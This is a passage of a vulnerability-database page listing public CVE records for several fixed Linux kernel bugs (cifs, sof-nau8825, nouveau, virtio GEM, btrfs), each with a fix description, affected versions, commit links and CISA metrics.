"url": "https://git.kernel.org/stable/c/147a0e71ccf96df9fc8c2ac500829d8e423ef02c"
},
{
"url": "https://git.kernel.org/stable/c/2fe0e281f7ad0a62259649764228227dd6b2561d"
},
{
"url": "https://git.kernel.org/stable/c/e208668ef7ba23efcbf76a8200cab8deee501c4d"
},
{
"url": "https://git.kernel.org/stable/c/df9db1a2af37f39ad1653c7b9b0d275d72d0bc67"
},
{
"url": "https://git.kernel.org/stable/c/546d60859ecf13380fcabcbeace53a5971493a2b"
},
{
"url": "https://git.kernel.org/stable/c/563431c1f3c8f2230e4a9c445fa23758742bc4f0"
},
{
"url": "https://git.kernel.org/stable/c/3d6cc9898efdfb062efb74dc18cfc700e082f5d5"
}
],
"title": "cifs: fix double free race when mount fails in cifs_get_root()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48919",
"datePublished": "2024-08-22T01:32:43.390Z",
"dateReserved": "2024-08-21T06:06:23.295Z",
"dateUpdated": "2025-05-04T08:26:06.308Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48889 (GCVE-0-2022-48889)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ASoC: Intel: sof-nau8825: fix module alias overflow
The maximum name length for a platform_device_id entry is 20 characters
including the trailing NUL byte. The sof_nau8825.c file exceeds that,
which causes an obscure error message:
sound/soc/intel/boards/snd-soc-sof_nau8825.mod.c:35:45: error: illegal character encoding in string literal [-Werror,-Winvalid-source-encoding]
MODULE_ALIAS("platform:adl_max98373_nau8825<U+0018><AA>");
^~~~
include/linux/module.h:168:49: note: expanded from macro 'MODULE_ALIAS'
^~~~~~
include/linux/module.h:165:56: note: expanded from macro 'MODULE_INFO'
^~~~
include/linux/moduleparam.h:26:47: note: expanded from macro '__MODULE_INFO'
= __MODULE_INFO_PREFIX __stringify(tag) "=" info
I could not figure out how to make the module handling robust enough
to handle this better, but as a quick fix, using slightly shorter
names that are still unique avoids the build issue.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48889",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:28.421801Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:55.252Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/soc/intel/boards/sof_nau8825.c",
"sound/soc/intel/common/soc-acpi-intel-adl-match.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fba1b23befd88366fe646787b3797e64d7338fd2",
"status": "affected",
"version": "8d0872f6239f9d067d538d8368bdec643bb0d255",
"versionType": "git"
},
{
"lessThan": "3e78986a840d59dd27e636eae3f52dc11125c835",
"status": "affected",
"version": "8d0872f6239f9d067d538d8368bdec643bb0d255",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/soc/intel/boards/sof_nau8825.c",
"sound/soc/intel/common/soc-acpi-intel-adl-match.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.17"
},
{
"lessThan": "5.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: Intel: sof-nau8825: fix module alias overflow\n\nThe maximum name length for a platform_device_id entry is 20 characters\nincluding the trailing NUL byte. The sof_nau8825.c file exceeds that,\nwhich causes an obscure error message:\n\nsound/soc/intel/boards/snd-soc-sof_nau8825.mod.c:35:45: error: illegal character encoding in string literal [-Werror,-Winvalid-source-encoding]\nMODULE_ALIAS(\"platform:adl_max98373_nau8825\u003cU+0018\u003e\u003cAA\u003e\");\n ^~~~\ninclude/linux/module.h:168:49: note: expanded from macro \u0027MODULE_ALIAS\u0027\n ^~~~~~\ninclude/linux/module.h:165:56: note: expanded from macro \u0027MODULE_INFO\u0027\n ^~~~\ninclude/linux/moduleparam.h:26:47: note: expanded from macro \u0027__MODULE_INFO\u0027\n = __MODULE_INFO_PREFIX __stringify(tag) \"=\" info\n\nI could not figure out how to make the module handling robust enough\nto handle this better, but as a quick fix, using slightly shorter\nnames that are still unique avoids the build issue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:32.915Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fba1b23befd88366fe646787b3797e64d7338fd2"
},
{
"url": "https://git.kernel.org/stable/c/3e78986a840d59dd27e636eae3f52dc11125c835"
}
],
"title": "ASoC: Intel: sof-nau8825: fix module alias overflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48889",
"datePublished": "2024-08-21T06:10:21.195Z",
"dateReserved": "2024-08-21T06:06:23.290Z",
"dateUpdated": "2025-05-04T08:25:32.915Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41095 (GCVE-0-2024-41095)
Vulnerability from cvelistv5
Published
2024-07-29 15:48
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_ld_modes
In nv17_tv_get_ld_modes(), the return value of drm_mode_duplicate() is
assigned to mode, which will lead to a possible NULL pointer dereference
on failure of drm_mode_duplicate(). Add a check to avoid npd.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:51.609Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9289cd3450d1da3e271ef4b054d4d2932c41243e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dbd75f32252508ed6c46c3288a282c301a57ceeb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/259549b2ccf795b7f91f7b5aba47286addcfa389"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d17604f2e44b3df21e218fe8fb3b836d41bac49"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f95ed0f54b3d3faecae1140ddab854f904a6e7c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cb751e48bbcffd292090f7882b23b215111b3d72"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bdda5072494f2a7215d94fc4124ad1949a218714"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/66edf3fb331b6c55439b10f9862987b0916b3726"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41095",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:20:25.562753Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:09.325Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/dispnv04/tvnv17.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9289cd3450d1da3e271ef4b054d4d2932c41243e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "dbd75f32252508ed6c46c3288a282c301a57ceeb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "259549b2ccf795b7f91f7b5aba47286addcfa389",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0d17604f2e44b3df21e218fe8fb3b836d41bac49",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f95ed0f54b3d3faecae1140ddab854f904a6e7c8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cb751e48bbcffd292090f7882b23b215111b3d72",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bdda5072494f2a7215d94fc4124ad1949a218714",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "66edf3fb331b6c55439b10f9862987b0916b3726",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/dispnv04/tvnv17.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_ld_modes\n\nIn nv17_tv_get_ld_modes(), the return value of drm_mode_duplicate() is\nassigned to mode, which will lead to a possible NULL pointer dereference\non failure of drm_mode_duplicate(). Add a check to avoid npd."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:58.956Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9289cd3450d1da3e271ef4b054d4d2932c41243e"
},
{
"url": "https://git.kernel.org/stable/c/dbd75f32252508ed6c46c3288a282c301a57ceeb"
},
{
"url": "https://git.kernel.org/stable/c/259549b2ccf795b7f91f7b5aba47286addcfa389"
},
{
"url": "https://git.kernel.org/stable/c/0d17604f2e44b3df21e218fe8fb3b836d41bac49"
},
{
"url": "https://git.kernel.org/stable/c/f95ed0f54b3d3faecae1140ddab854f904a6e7c8"
},
{
"url": "https://git.kernel.org/stable/c/cb751e48bbcffd292090f7882b23b215111b3d72"
},
{
"url": "https://git.kernel.org/stable/c/bdda5072494f2a7215d94fc4124ad1949a218714"
},
{
"url": "https://git.kernel.org/stable/c/66edf3fb331b6c55439b10f9862987b0916b3726"
}
],
"title": "drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_ld_modes",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41095",
"datePublished": "2024-07-29T15:48:08.324Z",
"dateReserved": "2024-07-12T12:17:45.637Z",
"dateUpdated": "2025-05-04T09:21:58.956Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48899 (GCVE-0-2022-48899)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/virtio: Fix GEM handle creation UAF
Userspace can guess the handle value and try to race GEM object creation
with handle close, resulting in a use-after-free if we dereference the
object after dropping the handle's reference. For that reason, dropping
the handle's reference must be done *after* we are done dereferencing
the object.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257 Version: 62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257 Version: 62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257 Version: 62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257 Version: 62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257 Version: 62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48899",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:56.343879Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:15.193Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/virtio/virtgpu_ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "19ec87d06acfab2313ee82b2a689bf0c154e57ea",
"status": "affected",
"version": "62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257",
"versionType": "git"
},
{
"lessThan": "d01d6d2b06c0d8390adf8f3ba08aa60b5642ef73",
"status": "affected",
"version": "62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257",
"versionType": "git"
},
{
"lessThan": "68bcd063857075d2f9edfed6024387ac377923e2",
"status": "affected",
"version": "62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257",
"versionType": "git"
},
{
"lessThan": "011ecdbcd520c90c344b872ca6b4821f7783b2f8",
"status": "affected",
"version": "62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257",
"versionType": "git"
},
{
"lessThan": "adc48e5e408afbb01d261bd303fd9fbbbaa3e317",
"status": "affected",
"version": "62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257",
"versionType": "git"
},
{
"lessThan": "52531258318ed59a2dc5a43df2eaf0eb1d65438e",
"status": "affected",
"version": "62fb7a5e10962ac6ae2a2d2dbd3aedcb2a3e3257",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/virtio/virtgpu_ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.4"
},
{
"lessThan": "4.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.229",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.89",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.270",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.229",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.164",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.89",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "4.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/virtio: Fix GEM handle creation UAF\n\nUserspace can guess the handle value and try to race GEM object creation\nwith handle close, resulting in a use-after-free if we dereference the\nobject after dropping the handle\u0027s reference. For that reason, dropping\nthe handle\u0027s reference must be done *after* we are done dereferencing\nthe object."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:44.649Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/19ec87d06acfab2313ee82b2a689bf0c154e57ea"
},
{
"url": "https://git.kernel.org/stable/c/d01d6d2b06c0d8390adf8f3ba08aa60b5642ef73"
},
{
"url": "https://git.kernel.org/stable/c/68bcd063857075d2f9edfed6024387ac377923e2"
},
{
"url": "https://git.kernel.org/stable/c/011ecdbcd520c90c344b872ca6b4821f7783b2f8"
},
{
"url": "https://git.kernel.org/stable/c/adc48e5e408afbb01d261bd303fd9fbbbaa3e317"
},
{
"url": "https://git.kernel.org/stable/c/52531258318ed59a2dc5a43df2eaf0eb1d65438e"
}
],
"title": "drm/virtio: Fix GEM handle creation UAF",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48899",
"datePublished": "2024-08-21T06:10:31.936Z",
"dateReserved": "2024-08-21T06:06:23.291Z",
"dateUpdated": "2025-05-04T08:25:44.649Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48901 (GCVE-0-2022-48901)
Vulnerability from cvelistv5
Published
2024-08-22 01:30
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: do not start relocation until in progress drops are done
We hit a bug with a recovering relocation on mount for one of our file
systems in production. I reproduced this locally by injecting errors
into snapshot delete with balance running at the same time. This
presented as an error while looking up an extent item
WARNING: CPU: 5 PID: 1501 at fs/btrfs/extent-tree.c:866 lookup_inline_extent_backref+0x647/0x680
CPU: 5 PID: 1501 Comm: btrfs-balance Not tainted 5.16.0-rc8+ #8
RIP: 0010:lookup_inline_extent_backref+0x647/0x680
RSP: 0018:ffffae0a023ab960 EFLAGS: 00010202
RAX: 0000000000000001 RBX: 0000000000000000 RCX: 0000000000000000
RDX: 0000000000000000 RSI: 000000000000000c RDI: 0000000000000000
RBP: ffff943fd2a39b60 R08: 0000000000000000 R09: 0000000000000001
R10: 0001434088152de0 R11: 0000000000000000 R12: 0000000001d05000
R13: ffff943fd2a39b60 R14: ffff943fdb96f2a0 R15: ffff9442fc923000
FS: 0000000000000000(0000) GS:ffff944e9eb40000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f1157b1fca8 CR3: 000000010f092000 CR4: 0000000000350ee0
Call Trace:
<TASK>
insert_inline_extent_backref+0x46/0xd0
__btrfs_inc_extent_ref.isra.0+0x5f/0x200
? btrfs_merge_delayed_refs+0x164/0x190
__btrfs_run_delayed_refs+0x561/0xfa0
? btrfs_search_slot+0x7b4/0xb30
? btrfs_update_root+0x1a9/0x2c0
btrfs_run_delayed_refs+0x73/0x1f0
? btrfs_update_root+0x1a9/0x2c0
btrfs_commit_transaction+0x50/0xa50
? btrfs_update_reloc_root+0x122/0x220
prepare_to_merge+0x29f/0x320
relocate_block_group+0x2b8/0x550
btrfs_relocate_block_group+0x1a6/0x350
btrfs_relocate_chunk+0x27/0xe0
btrfs_balance+0x777/0xe60
balance_kthread+0x35/0x50
? btrfs_balance+0xe60/0xe60
kthread+0x16b/0x190
? set_kthread_struct+0x40/0x40
ret_from_fork+0x22/0x30
</TASK>
Normally snapshot deletion and relocation are excluded from running at
the same time by the fs_info->cleaner_mutex. However if we had a
pending balance waiting to get the ->cleaner_mutex, and a snapshot
deletion was running, and then the box crashed, we would come up in a
state where we have a half deleted snapshot.
Again, in the normal case the snapshot deletion needs to complete before
relocation can start, but in this case relocation could very well start
before the snapshot deletion completes, as we simply add the root to the
dead roots list and wait for the next time the cleaner runs to clean up
the snapshot.
Fix this by setting a bit on the fs_info if we have any DEAD_ROOT's that
had a pending drop_progress key. If they do then we know we were in the
middle of the drop operation and set a flag on the fs_info. Then
balance can wait until this flag is cleared to start up again.
If there are DEAD_ROOT's that don't have a drop_progress set then we're
safe to start balance right away as we'll be properly protected by the
cleaner_mutex.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48901",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:33.459779Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:02.805Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/ctree.h",
"fs/btrfs/disk-io.c",
"fs/btrfs/extent-tree.c",
"fs/btrfs/relocation.c",
"fs/btrfs/root-tree.c",
"fs/btrfs/transaction.c",
"fs/btrfs/transaction.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6599d5e8bd758d897fd2ef4dc388ae50278b1f7e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5e70bc827b563caf22e1203428cc3719643de5aa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b4be6aefa73c9a6899ef3ba9c5faaa8a66e333ef",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/ctree.h",
"fs/btrfs/disk-io.c",
"fs/btrfs/extent-tree.c",
"fs/btrfs/relocation.c",
"fs/btrfs/root-tree.c",
"fs/btrfs/transaction.c",
"fs/btrfs/transaction.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: do not start relocation until in progress drops are done\n\nWe hit a bug with a recovering relocation on mount for one of our file\nsystems in production. I reproduced this locally by injecting errors\ninto snapshot delete with balance running at the same time. This\npresented as an error while looking up an extent item\n\n WARNING: CPU: 5 PID: 1501 at fs/btrfs/extent-tree.c:866 lookup_inline_extent_backref+0x647/0x680\n CPU: 5 PID: 1501 Comm: btrfs-balance Not tainted 5.16.0-rc8+ #8\n RIP: 0010:lookup_inline_extent_backref+0x647/0x680\n RSP: 0018:ffffae0a023ab960 EFLAGS: 00010202\n RAX: 0000000000000001 RBX: 0000000000000000 RCX: 0000000000000000\n RDX: 0000000000000000 RSI: 000000000000000c RDI: 0000000000000000\n RBP: ffff943fd2a39b60 R08: 0000000000000000 R09: 0000000000000001\n R10: 0001434088152de0 R11: 0000000000000000 R12: 0000000001d05000\n R13: ffff943fd2a39b60 R14: ffff943fdb96f2a0 R15: ffff9442fc923000\n FS: 0000000000000000(0000) GS:ffff944e9eb40000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f1157b1fca8 CR3: 000000010f092000 CR4: 